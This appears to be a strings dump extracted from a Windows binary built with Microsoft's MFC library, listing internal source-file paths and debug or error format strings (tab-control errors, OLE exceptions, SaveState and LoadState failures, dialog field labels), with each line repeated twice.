f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp

DeferWindowPos failded, error code %d

DeferWindowPos failded, error code %d

%sBasePane-%d%x

%sBasePane-%d%x

%sBasePane-%d

%sBasePane-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp

%sPane-%d%x

%sPane-%d%x

%sPane-%d

%sPane-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp

CMFCToolBarButton::CreateFromOleData. "Not Supported" exception

CMFCToolBarButton::CreateFromOleData. "Not Supported" exception

CMFCToolBarButton::CreateFromOleData. OLE exception: %x

CMFCToolBarButton::CreateFromOleData. OLE exception: %x

CMFCToolBarButton::PrepareDrag. OLE exception: %x

CMFCToolBarButton::PrepareDrag. OLE exception: %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h

SetActiveTab: illegal tab number %d

SetActiveTab: illegal tab number %d

EnsureVisible: illegal tab number %d

EnsureVisible: illegal tab number %d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

m_stgMedium.tymed =

m_stgMedium.tymed =

m_formatEtc.tymed =

m_formatEtc.tymed =

m_formatEtc.lindex =

m_formatEtc.lindex =

m_formatEtc.dwAspect =

m_formatEtc.dwAspect =

m_formatEtc.pdt =

m_formatEtc.pdt =

m_formatEtc.cfFormat =

m_formatEtc.cfFormat =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp

windows

windows

m_rectStartDrag.bottom =

m_rectStartDrag.bottom =

m_rectStartDrag.right =

m_rectStartDrag.right =

m_rectStartDrag.top =

m_rectStartDrag.top =

m_rectStartDrag.left =

m_rectStartDrag.left =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp

CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d

CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d

Last error = %x

Last error = %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp

ShowCmd

ShowCmd

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

Can't invoke command: %s

Can't invoke command: %s

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp

Empty command in user-defined tool: %d

Empty command in user-defined tool: %d

CUserTool::CopyIconToClipboard error. Error code = %x

CUserTool::CopyIconToClipboard error. Error code = %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp

RemoveTab: illegal tab number %d

RemoveTab: illegal tab number %d

ShowTab: illegal tab number %d

ShowTab: illegal tab number %d

IsTabVisible: illegal tab number %d

IsTabVisible: illegal tab number %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h

CMFCTabCtrl::SetImageList Can't load bitmap: %x

CMFCTabCtrl::SetImageList Can't load bitmap: %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp

@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp

@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp

%c%d%c%s

%c%d%c%s

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp

m_cc.lpCustColors

m_cc.lpCustColors

m_cc.Flags =

m_cc.Flags =

m_cc.rgbResult =

m_cc.rgbResult =

m_cc.hwndOwner =

m_cc.hwndOwner =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d

%sMFCOutlookBar-%d

?CMDIChildWnd

?CMDIChildWnd

CMDIFrameWnd

CMDIFrameWnd

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp

Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X

Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp

Hex={X,X,X}

Hex={X,X,X}

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp

CMDIClientAreaWnd

CMDIClientAreaWnd

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp

CMDIClientAreaWnd::OnCreate: can't create tabs window

CMDIClientAreaWnd::OnCreate: can't create tabs window

Unknown exception in CMDIClientAreaWnd::SaveState()!

Unknown exception in CMDIClientAreaWnd::SaveState()!

CArchiveException exception in CMDIClientAreaWnd::SaveState()!

CArchiveException exception in CMDIClientAreaWnd::SaveState()!

Memory exception in CMDIClientAreaWnd::SaveState()!

Memory exception in CMDIClientAreaWnd::SaveState()!

%sMDIClientArea-%d

%sMDIClientArea-%d

Unknown exception in CMDIClientAreaWnd::LoadState()!

Unknown exception in CMDIClientAreaWnd::LoadState()!

CArchiveException exception in CMDIClientAreaWnd::LoadState()!

CArchiveException exception in CMDIClientAreaWnd::LoadState()!

Memory exception in CMDIClientAreaWnd::LoadState!

Memory exception in CMDIClientAreaWnd::LoadState!

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp

Malformed Page Description string. Could not get string %d.

Malformed Page Description string. Could not get string %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp

?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp

?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

may cause RIPs under debug Windows.

may cause RIPs under debug Windows.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d

%sDockablePaneAdapter-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp

CMFCImageEditorDialog::Copy() error. Error code = %x

CMFCImageEditorDialog::Copy() error. Error code = %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp

CMFCToolBarsKeyboardPropertyPage

CMFCToolBarsKeyboardPropertyPage

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp

faulted while dumping object at $%p, %u bytes long

faulted while dumping object at $%p, %u bytes long

a %hs object at $%p, %u bytes long

a %hs object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

an object at $%p, %u bytes long

an object at $%p, %u bytes long

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp

ENABLE_KEYS

ENABLE_KEYS

KEYS_MENU

KEYS_MENU

KEYS

KEYS

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp

RGB(%d, %d, %d)

RGB(%d, %d, %d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d

%sMFCTasksPane-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

m_bz.hTask =

m_bz.hTask =

m_bz.hResource =

m_bz.hResource =

m_bz.lpszTemplate =

m_bz.lpszTemplate =

m_bz.hInstance =

m_bz.hInstance =

m_bz.lCustData =

m_bz.lCustData =

m_bz.lpszCaption =

m_bz.lpszCaption =

m_bz.hWndOwner =

m_bz.hWndOwner =

m_bz.dwFlags =

m_bz.dwFlags =

m_bz.cbStruct =

m_bz.cbStruct =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp

m_pd.nCopies =

m_pd.nCopies =

m_pd.nMaxPage =

m_pd.nMaxPage =

m_pd.nMinPage =

m_pd.nMinPage =

m_pd.nToPage =

m_pd.nToPage =

m_pd.nFromPage =

m_pd.nFromPage =

m_pd.Flags =

m_pd.Flags =
